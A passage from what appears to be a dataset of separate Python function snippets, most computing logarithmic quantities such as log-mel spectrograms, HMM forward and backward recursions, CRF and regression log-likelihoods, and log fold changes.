samples_splits:\n log_mel = mel_features.log_mel_spectrogram(\n samples_window,\n audio_sample_rate=vggish_params.SAMPLE_RATE,\n log_offset=vggish_params.LOG_OFFSET,\n window_length_secs=vggish_params.STFT_WINDOW_LENGTH_SECONDS,\n hop_length_secs=vggish_params.STFT_HOP_LENGTH_SECONDS,\n num_mel_bins=vggish_params.NUM_MEL_BINS,\n lower_edge_hertz=vggish_params.MEL_MIN_HZ,\n upper_edge_hertz=vggish_params.MEL_MAX_HZ)\n\n log_mel_examples.append(\n mel_features.frame(\n log_mel,\n window_length=self._example_window_length,\n hop_length=self._example_window_length))\n return log_mel_examples", "def test_loglike(dlm,Cl,noise,beam):\n lmax = Cl.shape[0]\n tt_exp = -1./2 * np.real(np.vdot(dlm.T,hp.almxfl(dlm,1/(beam[:lmax]**2*Cl[:,1]+noise[:lmax]))))\n #plt.plot(Cl[:,1])\n tt_det = - 1./2 *(np.arange(1,lmax+1)*np.log((noise[:lmax]+Cl[:,1]*beam[:lmax]**2))).sum() \n tt_f = tt_exp + tt_det\n return tt_exp,tt_det,tt_f#,Cl[:,1]", "def log_distr_fdmw(self, dnu, logflux, dme, logw, alpha, logls, logl0, mu, sigma, gtype=None):\n #stepdms = 100/1000.\n #vdms = np.arange(0, 100, stepdm)\n stepz = (np.log(self.Zmax) - np.log(self.Zmin)) / 1000\n vz = np.exp(np.arange(np.log(self.Zmin), np.log(self.Zmax), stepz))\n lik = 0\n for z in vz:\n likv = np.exp(self.log_distr_fdmwz(dnu, logflux, dme, logw, z, alpha, logls, logl0, mu, sigma, gtype=gtype))\n lik += z * stepz * likv\n ind = lik > 0\n ind2 = lik <= 0\n loglik = lik.copy()\n loglik[ind] = np.log(lik[ind])\n loglik[ind2] = np.ones(loglik[ind2].shape) * -1e99\n return loglik", "def _log_fold_change_pairs(self, idx0, idx1, base):\n logfc = np.zeros(shape=(len(idx0), len(idx1), self._theta_mle.shape[1]))\n for i, xi in enumerate(idx0):\n for j, xj in enumerate(idx1):\n logfc[i, j, :] = self._theta_mle[xi, :] - self._theta_mle[xj, :]\n\n if base == np.e:\n return logfc\n else:\n return logfc / 
np.log(base)", "def compute_edge_logits(self):", "def _log_fold_change_pairs(self, idx0, idx1, base):\n logfc = np.tile(np.NaN, [len(idx0), len(idx1), self.model_estim.x.shape[1]])\n for i, xi in enumerate(idx0):\n for j, xj in enumerate(idx1):\n logfc[i, j, :] = self._theta_mle[xj, :] - self._theta_mle[xi, :]\n logfc[j, i, :] = -logfc[i, j, :]\n\n if base == np.e:\n return logfc\n else:\n return logfc / np.log(base)", "def logfbank(signal,samplerate=16000,winlen=0.025,winstep=0.01,\n nfilt=40,nfft=512,lowfreq=64,highfreq=None,dither=1.0,remove_dc_offset=True,preemph=0.97,wintype='hamming'):\n feat,energy = fbank(signal,samplerate,winlen,winstep,nfilt,nfft,lowfreq,highfreq,dither, remove_dc_offset,preemph,wintype)\n return numpy.log(feat)", "def logits(self, features: torch.Tensor) -> torch.Tensor:\n return self.temporal_module(features)", "def logMelSpectrum(input, samplingrate):\n nfft = input.shape[1]\n tr_filter = trfbank(samplingrate, nfft)\n return np.log(np.dot(input, tr_filter.transpose()))", "def log_prior_grad(self, inputs):", "def get_logCRF(train, model):\n word = train[0]\n Y = train[1]\n char_count, _ = word.shape\n # calculating forward messages\n alpha = np.zeros((char_count, model.dimY))\n first_term = np.dot(word, model.getW(model.labels))\n second_term = model._T\n for i in range(1, char_count):\n sum_term = (first_term[i-1] + alpha[i-1]) + second_term\n alpha[i] = np.apply_along_axis(logsumexp_trick, 1, sum_term) \n # getting logZ from messages\n logZ = logsumexp_trick(first_term[char_count-1]+alpha[char_count-1])\n w_term = np.sum(model.getW(Y).transpose() * word) # $\\sum_{j=1}^m {W_{yj} . x_j}$\n t_term = np.sum(model.getT(Y[:-1], Y[1:])) #$T_{yj, yj+1}\n value = -logZ + w_term + t_term\n return value", "def loglf2py(store):\n loglike=0.0\n return loglinear.logl(store['xb'],store['xmatf'], store['beta'],store['yvec'],loglike)", "def logfbank(signal,samplerate=16000,winlen=0.025,winstep=0.01,\n nfilt=26,nfft=512,lowfreq=0,highfreq=None,preemph=0.97): \n feat, energy = fbank(signal,samplerate,winlen,winstep,nfilt,nfft,lowfreq,highfreq,preemph)\n return pylab.log(feat)", "def logistic_derivative(errors):\n return [log_deriv(error) for error in errors]", "def log(self): # just use base?\n return Factor().__build( VarSet(self.v) , np.log(self.t) )", "def log2(self):\n return Factor().__build( VarSet(self.v) , np.log2(self.t) )", "def log_fbank(signal, samplerate=16000, win_length=0.025, win_step=0.01, filters_num=26, NFFT=512, low_freq=0,\n\t\t\t high_freq=None, pre_emphasis_coeff=0.97):\n\tfeat, energy = fbank(signal, samplerate, win_length, win_step, filters_num, NFFT, low_freq, high_freq,\n\t\t\t\t\t\t pre_emphasis_coeff)\n\treturn numpy.log(feat)", "def fdm(self,trc,fd_step,lags,noise_scalar):\n ress=[]\n trc_out=trc/np.amax(np.abs(trc))\n noise=np.random.normal(0,1,len(trc_out))*(np.std(trc_out)/noise_scalar)\n trc_out=trc_out+noise\n for i,lag in enumerate(lags):\n trc_cp=trc_out.copy()\n t=len(trc)-1\n trc_cp[0:fd_step]=0\n while t>fd_step-1:\n trc_win=trc_out[t-fd_step:t+1]\n t_win=fd_step-1\n res=0\n while t_win>lag-1:\n res+=np.square(trc_win[t_win-lag]-trc_win[t_win])\n t_win-=1\n res=np.log10(1/(fd_step-lag)*res)\n trc_cp[t]=res\n t-=1\n if len(ress)==0:\n ress=np.reshape(trc_cp,(len(trc_cp),1))\n else:\n ress=np.concatenate((ress,np.reshape(trc_cp,(len(trc_cp),1))),axis=1)\n for i,j in enumerate(ress):\n slope = linregress(lags,ress[i,:])[0]\n trc_out[i]=slope\n \n return trc_out", "def log_forward_computations(self, x: list): \n n_x = len(x)\n \n # log_f_x 
initialized to -Inf because log(0) = -Inf\n log_f_x = np.zeros((self.n_states, n_x)) + logzero()\n x_emission_scores = np.array([self.scores['emission'][:, self.word_to_pos[w] if w in list(self.word_to_pos.keys()) else self.word_to_pos['UnknownWord']] for w in x]).T\n \n log_f_x[:,0] = x_emission_scores[:, 0] + self.scores['initial']\n \n for i in range(1,n_x):\n for s in range(self.n_states):\n log_f_x[s,i] = logsumexp(self.scores['transition'][s,:] + \n log_f_x[:,i-1]) + x_emission_scores[s, i]\n\n \n log_likelihood = logsumexp(self.scores['final'] + log_f_x[:,-1])\n \n return log_f_x, log_likelihood", "def log_distr_fdmwz(self, dnu, logflux, dme, logw, z, alpha, logls, logl0, mu, sigma, gtype=None):\n flux = np.power(10., logflux)\n logl = np.log10(self.cos.Luminosity(z, f=flux, dnu=dnu))\n logint1 = self.log_IntBeam(logl, alpha, logls, logl0)\n #print logint1\n logw0 = logw - np.log10(1+z)\n logfw = self.log_dis_logw(logw0, mu, sigma)\n logfz = self.log_Distribution_volume(z)\n dmi = self.cos.DispersionMeasure_IGM(z)\n u1 = (dme-dmi)*(1+z)*self.kappa(z)\n u2 = ((dme-dmi)*(1+z)-self.DMsmax)*self.kappa(z)\n #print u2\n logint2 = np.ones(u2.shape) * (-1e99)\n ind = u2 > 0\n logint2[ind] = self.log_IntDMsrc(u1[ind],u2[ind],gtype=gtype)\n #print logint2\n loglikv = logint1 + logfz + logfw + logint2 + np.log(1+z)\n return loglikv", "def loglike(store):\n nobs = store['yvec'].shape[0]\n calcweighted(store)\n store['regsampler'].update_yvec(store['yvectil'])\n store['regsampler'].update_xmat(store['xmattil'])\n return store['regsampler'].loglike(store['sigma'], store['beta'])", "def addFactors(self, flist, copy=True, isLog=False):\n row = np.zeros(2*len(flist),dtype=int)-1; col=row.copy(); data=np.zeros(2*len(flist));\n for k,f in enumerate(flist):\n if not isLog: \n if np.any(f.t<=0): f = f+1e-10; # TODO: log nonzero tol\n f = f.log()\n if f.nvar == 1:\n Xi = f.vars[0]\n self.h[Xi] += .5*(f[1]-f[0])\n self.c += .5*(f[1]+f[0])\n else:\n Xi,Xj = f.vars[0],f.vars[1]\n row[2*k],col[2*k],data[2*k] = int(Xi),int(Xj), .25*(f[1,1]+f[0,0]-f[0,1]-f[1,0])\n row[2*k+1],col[2*k+1],data[2*k+1] = col[2*k],row[2*k],data[2*k] \n #L[Xi,Xj] += .25*(f[1,1]+f[0,0]-f[0,1]-f[1,0])\n self.h[Xi] += .5*(f[1,0]-f[0,0])+data[2*k] #L[Xi,Xj]\n self.h[Xj] += .5*(f[0,1]-f[0,0])+data[2*k] #L[Xi,Xj]\n self.c += .25*(f[1,1]+f[1,0]+f[0,1]+f[0,0])\n self.L += csr((data[row>=0],(row[row>=0],col[row>=0])),shape=(self.nvar,self.nvar));", "def logmelfilterbank(\n audio,\n sampling_rate,\n fft_size=1024,\n hop_size=256,\n win_length=None,\n window=\"hann\",\n num_mels=80,\n fmin=None,\n fmax=None,\n eps=1e-10,\n):\n # # get amplitude spectrogram\n # x_stft = librosa.stft(audio, n_fft=fft_size, hop_length=hop_size,\n # win_length=win_length, window=window, pad_mode=\"reflect\")\n # spc = np.abs(x_stft).T # (#frames, #bins)\n\n # # get mel basis\n # fmin = 0 if fmin is None else fmin\n # fmax = sampling_rate / 2 if fmax is None else fmax\n # mel_basis = librosa.filters.mel(sampling_rate, fft_size, num_mels, fmin, fmax)\n\n # return np.log10(np.maximum(eps, np.dot(spc, mel_basis.T)))\n # logger.info('{} {}'.format(audio.shape, audio.device))\n x_stft2 = (\n torch.stft(\n audio,\n n_fft=fft_size,\n hop_length=hop_size,\n win_length=win_length,\n window=window,\n pad_mode=\"reflect\",\n ).transpose(0, 1)\n ** 2\n )\n # logger.info('{} {}'.format(x_stft2.shape, x_stft2.device))\n spc = (x_stft2[:, :, 0] + x_stft2[:, :, 1]).sqrt()\n\n # get mel basis\n fmin = 0 if fmin is None else fmin\n fmax = sampling_rate / 2 if fmax is None else fmax\n 
mel_basis = torch.tensor(\n librosa.filters.mel(sampling_rate, fft_size, num_mels, fmin, fmax),\n device=spc.device,\n ).transpose(0, 1)\n return torch.matmul(spc, mel_basis).clamp(min=eps).log10()", "def forward(log_emlik, log_startprob, log_transmat):\n alpha = np.zeros(log_emlik.shape)\n\n alpha[0,:] = log_startprob[0:-1] + log_emlik[0,:]\n\n sum_row = 0;\n log_transmat = log_transmat[0:-1];\n\n\n for frame in range(1,len(log_emlik)):\n\n for state in range(0,len(log_emlik[0])):\n\n alpha[frame,state] = logsumexp(alpha[frame-1,:] + log_transmat[:,state]) + log_emlik[frame,state]\n #print(alpha[frame,state])\n #print(alpha[frame,:])\n\n return alpha", "def statePosteriors(log_alpha, log_beta):\n\n gamma = np.zeros(log_alpha.shape)\n\n gamma = log_alpha + log_beta\n\n gamma = gamma - logsumexp(log_alpha[-1,:])\n\n return gamma", "def get_weights_from_log(log, plot = False):\n with open(log, 'r') as f:\n log_file = f.readlines()\n\n i = 0\n time = []\n weights_info = []\n weights_0 = []\n while i < len(log_file):\n if 'init-lambda-weights[' in log_file[i]:\n weights_0.append(float(log_file[i].split('=')[-1]))\n\n if 'MC-lambda information' in log_file[i]:\n # Finding the time\n for j in range(i,0,-1):\n if log_file[j].startswith(' Step Time'):\n j += 1\n time.append(float(log_file[j].split()[-1]))\n break\n # Finding the weight\n weights_info_tmp = []\n i += 3\n while log_file[i] != '\\n':\n split = log_file[i].split()\n count = int(split[2])\n weight = float(split[3])\n weights_info_tmp.append((count, weight))\n i += 1\n weights_info.append(weights_info_tmp)\n i += 1\n # Add weights at t = 0, because the counts are all 0 and I delate the entrances with total count 0 in next lines,\n # What i could do is put 1 in the initial temperature\n time.insert(0,0)\n weights_info.insert(0,list(zip([1] + (len(weights_0) - 1)*[0], weights_0)))\n\n #Converting to array\n time = np.array(time)\n weights_info = np.array(weights_info)\n # Some times (I don't know why) GROMACS reset all the weights and all the counts are 0. 
We need to eliminate those points\n sum_of_weights = weights_info[:,:,0].sum(axis = 1)\n time = time[sum_of_weights != 0]\n weights_info = weights_info[sum_of_weights != 0]\n sum_of_weights = sum_of_weights[sum_of_weights != 0]\n\n\n if plot:\n dir = os.path.dirname(log)\n fig, axes = plt.subplots(2, figsize = (16,9), sharex=True)\n NUM_COLORS = weights_info.shape[1]\n cm = plt.get_cmap('viridis')#gist_rainbow viridis\n for axe in axes:\n axe.set_prop_cycle('color', [cm(1.*j/NUM_COLORS) for j in range(NUM_COLORS)])\n\n probability = weights_info[:,:,0] / sum_of_weights[:,np.newaxis]\n for j in range(weights_info.shape[1]):\n #axes[0].plot(time, weights_info[:,j,0], label = str(j))\n axes[0].plot(time, probability[:,j], label = str(j))\n axes[1].plot(time, weights_info[:,j,1])\n\n fig.legend(loc = 'lower center', ncol = int(weights_info.shape[1] / 2))\n axes[0].set(\n xlim = (time.min(), time.max()),\n ylim = (0,1),\n ylabel = 'Probability',\n )\n axes[1].set(\n xlabel = 'Time [ps]',\n ylabel = 'Weight values'\n )\n #plt.show()\n fig.savefig(os.path.join(dir,'weights_progression.svg'), bbox_inches=\"tight\")\n\n # Plotting the violin plot of the weights\n df = pd.DataFrame()\n for j in range(weights_info.shape[1]):\n #df[temperatures[j]] = weights_info[:,j,1]\n df[j] = weights_info[:,j,1]\n # Set up the matplotlib figure\n sns.set_theme(style=\"whitegrid\")\n fig, ax = plt.subplots(figsize=(25, 25))\n\n # Draw a violinplot with a narrower bandwidth than the default\n sns.violinplot(data=df, palette=\"Set3\", bw=.2, cut=1, linewidth=1)\n # The plot is not over the actual temperatures, the temperatures ara only labels\n ax.plot(range(len(weights_info[0,:,1])), weights_info[0,:,1], '-o', label = 'Initial weights')\n ax.set(\n title = 'Weights per state over the entire simulation',\n xlabel = 'Sate',\n ylabel = 'Weight',\n )\n plt.legend()\n sns.despine(left=True, bottom=True)\n #plt.show()\n fig.savefig(os.path.join(dir,'weights_per_state.svg'), bbox_inches=\"tight\")\n sns.reset_defaults()\n\n return time, weights_info", "def log_features(data, columns):\n for col in columns:\n # deal with 0/1 values\n if np.sum(data[col] == 0) > 0:\n print('Replacing 0s with 0.025...')\n data.loc[data[col] == 0, col] = 0.025\n\n data[col] = np.log(data[col])", "def forward(self, reps):\n assert reps.shape[-1] == N_DIMS_PER_REP\n logits = torch.zeros(len(reps), N_UNIQUE_FEATS)\n logits[:, feat] = 1\n return logits", "def og_features(scan,filt=None,base_noise=None,thresh=-1.4781e-10,diff=1,verbose=False,scale=10):\n #get gradients of data\n der = np.array(np.gradient(scan,diff))\n \n #calculate gardient magnitudes and directions\n der_mag = np.linalg.norm(der,axis=0) \n der_uvecs = der/der_mag\n \n z_cur = np.copy(scan).ravel()\n\n #estimate noise level and set derivative filter threshold\n if filt is None:\n filt = np.mean(signaltonoise(der_mag)[-1])\n \n \n if base_noise is not None:\n filt = np.maximum(filt,base_noise)\n \n\n\n #filter directions and magnitudes\n x, y, z = der_uvecs[0].ravel(), der_uvecs[1].ravel(), der_mag.ravel()\n \n #filter using threshold and filt\n x_filt, y_filt, z_filt = x[z_cur>thresh], y[z_cur>thresh], z[z_cur>thresh]\n #x_filt, y_filt, z_filt = x, y, z\n\n \n #print(len(z_filt))\n x_filt, y_filt, z_filt = x_filt[z_filt>filt], y_filt[z_filt>filt], z_filt[z_filt>filt]\n\n \n #calculate angles\n angles_filt = np.sign(y_filt)*np.arccos(x_filt/1)\n\n \n #print(len(angles_filt))\n \n if len(angles_filt) < 2:\n return 0,0,0\n \n #fit single line\n sol1 = 
least_squares(ress_1line,[-np.pi/2],args=(angles_filt,),bounds=[-np.pi,0],method='dogbox',jac='2-point',max_nfev=2000)\n\n #fit two lines by grid search\n #sol_grid = grid_search(ress_2line,angles_filt,[[-np.pi,0],[-np.pi,0]])\n \n \n singleline = sol1.x[0]\n \n mx = np.minimum(np.abs(singleline-(-np.pi)),np.abs(singleline))\n \n sol_grid = grid_search(ress_2line_pm,angles_filt,[[0,mx]],umid = singleline)\n spread_lines = sol_grid[1]\n sol_grid[1] = [singleline+spread_lines,singleline-spread_lines]\n \n \n #compute average of squared residuals for both cases\n resid1 = ress_1line(sol1.x,angles_filt)\n\n grid_c11 = np.average(np.power(resid1,2))\n \n grid_c11 = np.average(np.abs(resid1))\n \n grid_c21 = sol_grid[-1]\n \n \n multip = cotunnel_score2(scan,scan>thresh,diff,scale)\n \n final_grid2 = multip*(grid_c11-grid_c21)\n \n \n \"\"\"\n plt.scatter(angles_filt,z_filt,marker='x',c='k',s=15,linewidth=0.4)\n plt.axvline(sol1.x,color='b')\n plt.axvline(sol1.x+(np.pi),color='b')\n plt.axvline(sol_grid[1][0],0,color='r', linestyle='--')\n plt.axvline(sol_grid[1][1],0,color='r', linestyle='--')\n \n plt.axvline(sol_grid[1][0]+(np.pi),0,color='r', linestyle='--')\n plt.axvline(sol_grid[1][1]+(np.pi),0,color='r', linestyle='--')\n \n plt.xlabel(\"$\\\\theta_g$ / rad\")\n \n plt.xlim([-np.pi,np.pi])\n plt.ylim([0,z.max()])\n \n \n plt.ylabel(\"$|g|$\")\n \n plt.xticks([-np.pi,0,np.pi])\n \n plt.locator_params(axis='y', nbins=2)\n \n plt.savefig(\"og_fig.svg\")\n \n plt.show()\n \"\"\"\n return final_grid2,multip,(grid_c11-grid_c21)", "def log_marginal_likelihood(X_train,y_train,phi,tau=1.,Ve=1.e-10):", "def llf(self):\n return self.model.loglike(self.params)", "def logistic(weights, data, targets, hyperparameters):\n\n # TODO: Finish this function\n\n return f, df, y", "def compute_forward_variables(self, normalized_logits, target):\n\n target_length = target.shape[0]\n num_time_steps = normalized_logits.shape[0]\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n \n blank_label = normalized_logits.shape[1] - 1\n l = add_blanks(target, blank_label)\n target_length = l.shape[0]\n\n # init\n alpha = np.zeros((target_length, num_time_steps))\n alpha[0, 0] = normalized_logits[0, blank_label] # where s = 0, t = 0\n alpha[1, 0] = normalized_logits[0, target[0]] # where s = 1, t = 0\n for i in xrange(2, num_time_steps): # for all s >= 2, t = 0\n alpha[i, 0] = 0\n\n # recursive case\n for t in xrange(1, num_time_steps):\n for s in xrange(2, target_length):\n \n a_bar = alpha[s, t-1] + alpha[s-1, t-1] \n\n if l[s] == blank_label or l[s-2] == l[s]:\n alpha[s, t] = normalized_logits[t, l[s]] * a_bar\n else:\n alpha[s, t] = normalized_logits[t, l[s]] * (a_bar + alpha[s-2, t-1])\n return alpha", "def __convert_to_log(self):\n for i in range(self.nStates):\n if self.pi[i]>0:\n self.pi[i]=log(self.pi[i])\n else:\n self.pi[i]=float('-inf')\n for j in range(self.nStates):\n if self.t[i][j]>0:\n self.t[i][j]=log(self.t[i][j])\n else:\n self.t[i][j]=float('-inf')\n for j in range(self.nObs):\n if self.e[i][j]>0:\n self.e[i][j]=log(self.e[i][j])\n else:\n self.e[i][j]=float('-inf')\n self.logdomain=True", "def forward(log_emlik, log_startprob, log_transmat):\n logPi=log_startprob[:-1]\n logB=log_emlik\n logA=log_transmat[:-1,:-1]\n alpha = np.zeros_like(logB)\n alpha[0]=logB[0]+logPi\n for i in range(1,logB.shape[0]):\n for j in range(logA.shape[0]):\n alpha[i][j]=logsumexp(alpha[i-1]+logA[:,j]+logB[i][j])\n return alpha", "def logmelfilterbank(audio,\r\n sampling_rate,\r\n 
fft_size=1024,\r\n hop_size=256,\r\n win_length=None,\r\n window=\"hann\",\r\n num_mels=80,\r\n fmin=None,\r\n fmax=None,\r\n eps=1e-10,\r\n ):\r\n # get amplitude spectrogram\r\n x_stft = librosa.stft(audio, n_fft=fft_size, hop_length=hop_size,\r\n win_length=win_length, window=window, pad_mode=\"reflect\")\r\n spc = np.abs(x_stft).T # (#frames, #bins)\r\n\r\n # get mel basis\r\n fmin = 0 if fmin is None else fmin\r\n fmax = sampling_rate / 2 if fmax is None else fmax\r\n mel_basis = librosa.filters.mel(sampling_rate, fft_size, num_mels, fmin, fmax)\r\n\r\n return np.log10(np.maximum(eps, np.dot(spc, mel_basis.T)))", "def NMF(model, maxIter=100, beliefs=None, verbose=False):\n if beliefs is None: beliefs = [Factor([Xi],1.0/Xi.states) for Xi in model.X]\n \n lnZ = sum([beliefs[Xi].entropy() for Xi in model.X])\n for f in model.factors:\n m = f.log()\n for v in f.vars: m *= beliefs[v]\n lnZ += m.sum()\n if verbose: print(\"Iter 0: \"+str(lnZ))\n\n for t in xrange(1,maxIter+1): # for each iteration:\n # Update all the beliefs via coordinate ascent:\n for Xi in model.X: # for each variable, \n bNew = 0.0 # compute E[ log f ] as a function of Xi:\n for f in model.factorsWith(Xi,copy=False): # for each factor f_a, compute:\n m = f.log() # E[log f_a] = \\sum \\log f_a \\prod b_v\n for v in f.vars - [Xi]: m *= beliefs[v]\n bNew += m.marginal([Xi]) # sum them up to get E[log f]\n bNew -= bNew.max() # (numerical issues)\n bNew = bNew.exp()\n bNew /= bNew.sum() # set b(Xi) = exp( E[log f] ) / Z\n beliefs[Xi] = bNew\n #\n # Compute the lower bound on the partition function:\n # E_b [ log f ] + H(b) = \\sum_a E[log f_a] + \\sum_i H(b_i) for independent beliefs\n lnZ = sum([beliefs[Xi].entropy() for Xi in model.X])\n for f in model.factors:\n m = f.log()\n for v in f.vars: m *= beliefs[v]\n lnZ += m.sum()\n if verbose: print(\"Iter \"+str(t)+\": \"+str(lnZ))\n return lnZ,beliefs", "def forward(self, mel_coarse):\n logit = self.layers(mel_coarse)\n y = F.sigmoid(logit)\n return y, logit", "def brownian_motion_log_returns(param):\n sqrt_delta_sigma = math.sqrt(param.time_rate) * param.vol\n return nrand.normal(loc=0, scale=sqrt_delta_sigma, size=param.time)", "def brownian_motion_levels(param):\n return convert_to_prices(param, brownian_motion_log_returns(param))", "def log10(self):\n return Factor().__build( VarSet(self.v) , np.log10(self.t) )", "def log2_inplace(a):", "def _log_fold_change_pairs(self, idx0, idx1, base):\n assert np.all([x < self._pval.shape[1] for x in idx0])\n assert np.all([x < self._pval.shape[1] for x in idx1])\n if base == np.e:\n return self._logfc[idx0, :, :][:, idx1, :]\n else:\n return self._logfc[idx0, :, :][:, idx1, :] / np.log(base)", "def __log_likelihood(self, params, *args):\n\t\tX, y, feature_set, lambda_reg, empirical_weights, verbose, sign = args\n\n\t\tno_example = len(X)\n\t\ttotal_logZ = 0\n\t\ttotal_logProb = 0\n\t\texpected_weights = np.zeros(len(feature_set))\n\t\tfor t in range(len(X)):\n\t\t\t# example_features = X[t], example_labels = y[t]\n\n\t\t\tpotential = np.zeros(len(X[t]))\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\t#candidate_features = X[t][i], candidate_label = y[t][i]\n\t\t\t\tpotential[i] = feature_set.calc_inner_product(X[t][i], params)\n\n\t\t\t#scaling\n\t\t\tpotential = potential - np.max(potential, keepdims=True)\n\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\ttotal_logProb += potential[i] * y[t][i]\n\n\t\t\tpotential, Z = self.__softmax(potential)\n\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\tfeature_set.calc_inner_sum(expected_weights, X[t][i], 
potential[i])\n\n\t\t\ttotal_logZ += log(Z)\n\n\t\t# _params = feature_set.get_regularized_params(params, 'bias')\n\t\t_params = params\n\t\tlog_likelihood = total_logProb - total_logZ - (lambda_reg/2) * np.sum(np.multiply(_params,_params))\n\t\tgradients = empirical_weights - expected_weights - lambda_reg * _params\n\n\t\tglobal SUB_ITERATION_NUM\n\t\tif verbose:\n\t\t\tsub_iteration_str = ' '\n\t\t\tif SUB_ITERATION_NUM > 0:\n\t\t\t\tsub_iteration_str = '(' + '{0:02d}'.format(SUB_ITERATION_NUM) + ')'\n\t\t\tprint(' ', '{0:03d}'.format(ITERATION_NUM), sub_iteration_str, ':', log_likelihood * sign)\n\n\t\tSUB_ITERATION_NUM += 1\n\n\t\treturn sign * log_likelihood, sign * gradients", "def add_mf_updates(self):\n \n if self.num_hidden == 0:\n \n self.mf_updates, _ =\\\n theano.scan(lambda i: self.sigmoid_update(self.mf_vis_p,i),\n sequences = [T.arange(self.num_vars)])\n \n elif self.num_hidden > 0:\n \n self.mf_vis_updates = self.sigmoid_update_vis(self.mf_hid_p)\n \n self.mf_hid_updates = self.sigmoid_update_hid(self.mf_vis_p)\n \n # damp high oscillations:\n self.mf_vis_updates = 0.02*self.mf_vis_p + 0.98*self.mf_vis_updates\n \n self.mf_hid_updates = 0.02*self.mf_hid_p + 0.98*self.mf_hid_updates\n #####", "def log_inplace(a):", "def f_log_decoding(x, out_reflection=False):\n a = 0.555556\n b = 0.009468\n c = 0.344676\n d = 0.790453\n e = 8.735631\n f = 0.092864\n cut2 = 0.100537775223865\n\n y = np.where(x < cut2,\n (x - f) / e,\n (10 ** ((x - d) / c)) / a - (b / a))\n\n if not out_reflection:\n y = y / 0.9\n\n return y", "def backward(log_emlik, log_startprob, log_transmat):\n #print(log_transmat)\n beta = np.zeros(log_emlik.shape)\n n = len(log_emlik)-2\n log_transmat = log_transmat[0:-1,0:-1];\n\n\n\n while n >= 0:\n\n for j in range(0,len(log_emlik[0])):\n\n beta[n,j] = logsumexp(log_transmat[j,:] + log_emlik[n+1,:] + beta[n+1,:])\n\n n = n -1\n #print(beta[n,:])\n #print(beta)\n return beta", "def KFilt(sample,fs=25):\n\t#kalman filter inputs\n \n # Dimensions of parameters:\n # 'transition_matrices': 2,\n # 'transition_offsets': 1,\n # 'observation_matrices': 2,\n # 'observation_offsets': 1,\n # 'transition_covariance': 2,\n # 'observation_covariance': 2,\n # 'initial_state_mean': 1,\n # 'initial_state_covariance': 2,\n \n n_timesteps = len(sample)\n trans_mat = []\n\n\t#mask missing values\n observations = np.ma.array(sample,mask=np.zeros(sample.shape))\n missing_loc = np.where(np.isnan(sample))\n observations[missing_loc[0][:],missing_loc[1][:]] = np.ma.masked\n\t\n\t#Import Kalman filter, inerpolate missing points and get 2nd, 3rd orde kinematics\n dt = 1./25\t#Length of each frame (should be iether 1/25 or 1/30)\t\n n_timesteps = len(sample)\n \n observation_matrix = np.array([[1,0,0,0],\n [0,1,0,0]])#np.eye(4) \n t = np.linspace(0,len(observations)*dt,len(observations))\n q = np.cov(observations.T[:2,:400])\n qdot = np.cov(np.diff(observations.T[:2,:400]))#np.cov(observations[:1,:400])\n\n h=(t[-1]-t[0])/t.shape[0]\n A=np.array([[1,0,h,.5*h**2], \n [0,1,0,h], \n [0,0,1,0],\n [0,0,0,1]]) \n\n init_mean = [sample[0],0,0] #initial mean should be close to the first point, esp if first point is human-picked and tracking starts at the beginning of a video\n observation_covariance = q*500 #ADJUST THIS TO CHANGE SMOOTHNESS OF FILTER\n init_cov = np.eye(4)*.001#*0.0026\n transition_matrix = A\n transition_covariance = np.array([[q[0,0],q[0,1],0,0],\n [q[1,0],q[1,1],0,0],\n [0,0,qdot[0,0],qdot[0,1]],\n [0,0,qdot[1,0],qdot[1,1]]])\n\n kf = KalmanFilter(transition_matrix, 
observation_matrix,transition_covariance,observation_covariance,n_dim_obs=2)\n\n kf = kf.em(observations,n_iter=1,em_vars=['transition_covariance','transition_matrix','observation_covariance'])\n\n #pdb.set_trace()\n \n global trans_mat, trans_cov, init_cond\n x_filt = kf.filter(observations[0])[0]#observations.T[0])[0]\n kf_means = kf.smooth(observations[0])[0]\n\t\n return kf_means,x_filt #np.column_stack((color_x[:,0],color_y[:,0],color_x[:,1],color_y[:,1])),frames", "def pre_logits(self, feats: Tuple[torch.Tensor]) -> torch.Tensor:\n # The EfficientFormerClsHead doesn't have other module, just return\n # after unpacking.\n return feats[-1]", "def llf_obs(self):\n return self.model.loglikeobs(self.params)", "def test_lfc_ml2():\n levels = np.array([1024.95703125, 1016.61474609, 1005.33056641, 991.08544922, 973.4163208,\n 951.3381958, 924.82836914, 898.25482178, 873.46124268, 848.69830322,\n 823.92553711, 788.49304199, 743.44580078, 700.50970459, 659.62017822,\n 620.70861816, 583.69421387, 548.49719238, 515.03826904, 483.24401855,\n 453.0418396, 424.36477661, 397.1505127, 371.33441162, 346.85922241,\n 323.66995239, 301.70935059, 280.92651367, 261.27053833, 242.69168091,\n 225.14237976, 208.57781982, 192.95333862, 178.22599792, 164.39630127,\n 151.54336548, 139.68635559, 128.74923706, 118.6588974, 109.35111237,\n 100.76405334, 92.84288025, 85.53556824, 78.79430389, 72.57549286,\n 66.83885193, 61.54678726, 56.66480637, 52.16108322]) * units.mbar\n temperatures = np.array([6.00750732, 5.14892578, 4.177948, 3.00268555, 1.55535889,\n -0.25527954, -1.93988037, -3.57766724, -4.40600586, -4.19238281,\n -3.71185303, -4.47943115, -6.81280518, -8.08685303, -8.41287231,\n -10.79302979, -14.13262939, -16.85784912, -19.51675415,\n -22.28689575, -24.99938965, -27.79664612, -30.90414429,\n -34.49435425, -38.438797, -42.27981567, -45.99230957,\n -49.75340271, -53.58230591, -57.30686951, -60.76026917,\n -63.92070007, -66.72470093, -68.97846985, -70.4264679,\n -71.16407776, -71.53797913, -71.64375305, -71.52735901,\n -71.53523254, -71.61097717, -71.92687988, -72.68682861,\n -74.129776, -76.02471924, -76.88977051, -76.26008606,\n -75.90351868, -76.15809631]) * units.celsius\n dewpoints = np.array([4.50012302, 3.42483997, 2.78102994, 2.24474645, 1.593485, -0.9440815,\n -3.8044982, -3.55629468, -9.7376976, -10.2950449, -9.67498302,\n -10.30486488, -8.70559597, -8.71669006, -12.66509628, -18.6697197,\n -23.00351334, -29.46240425, -36.82178497, -41.68824768, -44.50320816,\n -48.54426575, -52.50753403, -51.09564209, -48.92690659, -49.97380829,\n -51.57516098, -52.62096405, -54.24332809, -57.09109879, -60.5596199,\n -63.93486404, -67.07530212, -70.01263428, -72.9258728, -76.12271881,\n -79.49847412, -82.2350769, -83.91127014, -84.95665741, -85.61238861,\n -86.16391754, -86.7653656, 